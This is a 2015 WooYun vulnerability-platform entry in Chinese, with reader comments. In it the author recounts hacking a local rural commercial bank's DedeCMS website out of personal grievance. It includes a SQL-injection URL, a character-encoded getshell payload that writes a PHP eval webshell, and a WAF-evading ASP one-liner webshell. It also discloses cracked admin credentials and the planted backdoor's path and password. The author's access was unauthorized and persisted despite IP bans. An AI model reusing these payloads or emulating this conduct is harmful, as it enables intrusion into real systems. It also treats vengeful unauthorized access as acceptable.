当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(52) 关注此漏洞

缺陷编号: WooYun-2015-103180

漏洞标题: 对广东省某商业银行的安全检测全过程

相关厂商: 对广东省某商业银行

漏洞作者: 猪猪侠表哥

提交时间: 2015-03-23 13:52

公开时间: 2015-05-08 17:34

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开

简要描述:

先来个开场白吧,前几天无聊, 本来想看看市xx局的,后来想了下,还有几天就要开学了,然后就想到学校的一卡通,还有进校门就要刷卡,一卡通是学校跟高要农商银行合作的,还他妈的不支持支付宝转账,跨行转账就要五块钱的手续费,想想都觉得可怕,他妈的就是在这里坑钱的,对于本穷屌来说就更可怕了。我亦为何偏偏喜欢它呢?又想起以前的心酸往事了,本穷屌申请了国家的助学金,学校一定要去高要农商银行办卡才能给你发助学金,一定要去市中医院对面的那间高要农商银行办卡,后来我就和王某去了那间银行,结果我们到了并表示来意的时候,那间银行的经理叫我们到其他的支行去办,说他们要下班了,但是离他们下班的时间还有一个小时,但他就不肯让我们在这里班,怕拖延他下班的时间,我们就想,反正都是同一个银行,到其他支行办也应该行的,后来就找了几间支行,最后找到一间是没有下班的,办完之后,没想到第二天去交复印件的时候,辅导员就问我们去那间办的银行卡,我们说了之后,辅导员说,不行,一定要到指定的那间,要不学校是不会认的,我们只好中午再出去办,去到银行,有很多人,只能慢慢排队,结果就要上课了,还没有轮到我们,就只好请假咯,正好那天下午是我想上的ps课,后来就顺利交了复印件,可是我等那钱等到学期末,还没有发,正好我那时手头紧,一次次失望之后,说今学期不发,要到下个学期才发,原因嘛?就是学校要做那一卡通,合作的银行,还是高要农商银行。草泥马,又是这间银行,所以这次,嘻嘻!

详细说明:

目标:**.**.**.**

首先来爬行一下网站

发现了熟悉的plus目录

目测是梦织的程序

直接上EXP(用的是椰树)

帐号密码出来了

QQ截图20150307025551.png



dmin(其实真实的帐号是admin) 6cbe0658e888860c8a04

这md5密文是20位的,怎么变成16位呢?

dedecms的密文都是去掉前三位和最后一位

e0658e888860c8a0

这样就可以了,拿去解密,发现要收费,本穷屌没钱,就拿了基友的帐号,花了一毛钱,把密文解出来了

解出来的结果是gy2013gy

现在最要是找后台了,各种工具扫描都没有结果

就利用搜索引擎来找吧,也没有结果

后来发现之前这间银行已经被别人爆过菊了

一年钱就有白帽子在乌云上提交过这间银行 的漏洞

看到这个毕竟有些失落和希望

他也是找不到后台,但是他是直接getshell的

所以用一下他用的EXP,看下是否有用

code 区域
plus/search.php?keyword=as&typeArr[111%3D@`/'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`/'`+]=a



这个,没用

再直接getshell看看

code 区域
/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96



也没有成功,显然之前的漏洞已经补上了。

想看下有没有旁站,结果也没有,这个站用的是独立服务器。

最后的一点希望也变成失望,那就只能乖乖找后台咯

过了几天之后,又有心情了,继续

/dede 没用

/admin 没用

/login 没用

/manage 没用

/gy 没用

/gyebank 没用

/ebank 没用

/bank 发现跳转到/bank/login.php

后台终于找到了

http://**.**.**.**/bank/login.php

QQ截图20150307024914.png



ok 试下帐号密码

dmin gy2013

登陆时说帐号不存在

郁闷了,怎么会这样

想了想,还是试下这个吧

admin gy2013

人品啊,终于登陆成功了

QQ截图20150307024957.png



终于拿下后台管理员权限了

经验告诉我

这种后台拿webshell权限有两种

1.在新增广告那里插入一句话木马

2.在模块那里插入木马,再更新下主页

但是,这次跟上面那里一样,都没有那么顺利

在广告那里插入一句话木马

QQ截图20150307030022.png



这个还是过安全狗的一句话木马



<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>



保存成功,用过狗菜刀去链接,报错

尼玛,银行装的防护软件就是牛

尝试链接多几次,还是不行,显示超时

原来我被银行封ip了

之前在测试可用的EXP代码时也被封过几次

貌似只封一两小时

也当是中场休息吧

过了两个小时之后,发现能访问银行网站了,终于解封了

再进后台,发现之前插的一句话木马被删除了

银行就是屌啊

这次换下思路,在管理器那里插

QQ截图20150307030240.png



但是用过狗菜刀连接时,又连接不上

最后又被封ip了

又过了两个小时解封后

这次我真的发怒了

直接在模块那里插php大马

QQ截图20150307041247.png



更新下主页

QQ截图20150307041451.png



成功

访问下大马的地址

http://**.**.**.**/gyadmin.php ; 密码为king

成功

QQ截图20150307041521.png



QQ截图20150307041543.png



ok webshell权限拿到了。搞这个站真是坎坷啊!



随便吐槽一下,学校居然跟这种安全做得这么渣的银行合作。



呵呵,一年前是被别人爆菊,现在是被我爆菊

漏洞证明:

QQ截图20150307025551.png



QQ截图20150307024914.png



QQ截图20150307024957.png



QQ截图20150307030022.png



QQ截图20150307030240.png



QQ截图20150307041247.png



QQ截图20150307041451.png



QQ截图20150307041521.png



QQ截图20150307041543.png

修复方案:

我已经分不清我是在提交漏洞还是在写故事了

版权声明:转载请注明来源 猪猪侠表哥@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-24 17:33

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-03-23 14:02 | sqlfeng ( 普通白帽子 | Rank:573 漏洞数:74 | http://weibo.com/fds1986)
    0

    洞主憋了很久了!CCTV看这里!

    1# 回复此人
  2. 2015-03-23 14:03 | zzR 认证白帽子 ( 核心白帽子 | Rank:1408 漏洞数:125 | 东方红**联盟欢迎你-0-)
    0

    表哥*•*

    2# 回复此人
  3. 2015-03-23 14:06 | 动后河 ( 实习白帽子 | Rank:57 漏洞数:16 | ☭)
    0

    所以王某指的就是猪哥了?

    3# 回复此人
  4. 2015-03-23 14:09 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    你就是传说中的婊婊?

    4# 回复此人
  5. 2015-03-23 14:09 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)
    0

    打错了。是表表。

    5# 回复此人
  6. 2015-03-23 14:11 | also ( 普通白帽子 | Rank:434 漏洞数:53 | 招渗透/php/前端/ios&android安全,广州)
    0

    @动后河 所以王某指的就是猪哥了?

    6# 回复此人
  7. 2015-03-23 14:11 | 泳少 ( 普通白帽子 | Rank:255 漏洞数:83 | ★ 梦想这条路踏上了,跪着也要...)
    0

    一眼看成猪猪侠

    7# 回复此人
  8. 2015-03-23 14:29 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)
    0

    这是什么愁什么怨啊

    8# 回复此人
  9. 2015-03-23 14:31 | 0x 80 ( 普通白帽子 | Rank:1726 漏洞数:483 | A security company recruitment penetrati...)
    0

    你也太扯了。

    9# 回复此人
  10. 2015-03-23 14:34 | D_in ( 普通白帽子 | Rank:423 漏洞数:65 | 到我嘴里来)
    0

    猪猪侠表哥好厉害

    10# 回复此人
  11. 2015-03-23 14:44 | 炊烟 ( 普通白帽子 | Rank:238 漏洞数:44 | 每一天都需要努力。)
    0

    大表哥

    11# 回复此人
  12. 2015-03-23 14:48 | 白非白 认证白帽子 ( 普通白帽子 | Rank:475 漏洞数:68 | ♫ Freedom - Anthony Hamilton ♫)
    0

    前戏好足啊

    12# 回复此人
  13. 2015-03-23 14:54 | 哈哈 ( 路人 | Rank:2 漏洞数:1 | 哈哈)
    0

    13# 回复此人
  14. 2015-03-23 15:12 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
    0

    前戏好足啊

    14# 回复此人
  15. 2015-03-23 17:11 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1117 漏洞数:144 | M:出售GOV STATE NSA CIA NASA DHS Symant...)
    0

    前戏好足啊

    15# 回复此人
  16. 2015-03-24 11:18 | s3xy ( 普通白帽子 | Rank:990 漏洞数:130 | 相濡以沫,不如相忘于江湖)
    0

    前戏好足啊

    16# 回复此人
  17. 2015-03-24 12:17 | 猪猪侠表哥 ( 实习白帽子 | Rank:46 漏洞数:6 | 听说我表弟在这里混得不错。)
    0

    @0x 80 feng,我是有点扯,哈哈

    17# 回复此人
  18. 2015-03-24 12:17 | 猪猪侠表哥 ( 实习白帽子 | Rank:46 漏洞数:6 | 听说我表弟在这里混得不错。)
    0

    @白非白 必须的

    18# 回复此人
  19. 2015-03-24 12:30 | ModNar ( 实习白帽子 | Rank:35 漏洞数:4 | 路人甲)
    0

    dede?

    19# 回复此人
  20. 2015-03-24 17:39 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)
    0

    接下来会有猪猪侠表妹,表兄,表弟的

    20# 回复此人
  21. 2015-03-24 18:17 | 疏懒 ( 普通白帽子 | Rank:363 漏洞数:43 | 不能尽如人意,但求知足常乐~!)
    0

    一眼看成猪猪侠,还在想猪猪侠怎么会缺钱。。。

    21# 回复此人
  22. 2015-03-24 20:16 | 明月影 ( 路人 | Rank:12 漏洞数:8 )
    0

    手头紧……

    22# 回复此人
  23. 2015-05-08 19:28 | 浅蓝 ( 普通白帽子 | Rank:283 漏洞数:111 | 圈内最帅,没有之一)
    0

    醉了 PHP扩展名你写asp的代码

    23# 回复此人
  24. 2015-05-08 19:34 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    0

    尼玛,欺骗猪猪侠感情

    24# 回复此人
  25. 2015-05-08 23:54 | Mark ( 路人 | Rank:14 漏洞数:5 | You deserve more)
    0

    洞主憋了很久了

    25# 回复此人
  26. 2015-05-09 11:16 | todaro ( 实习白帽子 | Rank:39 漏洞数:12 | 完结。)
    0

    贴吧文章即视感

    26# 回复此人

登录后才能发表评论,请先 登录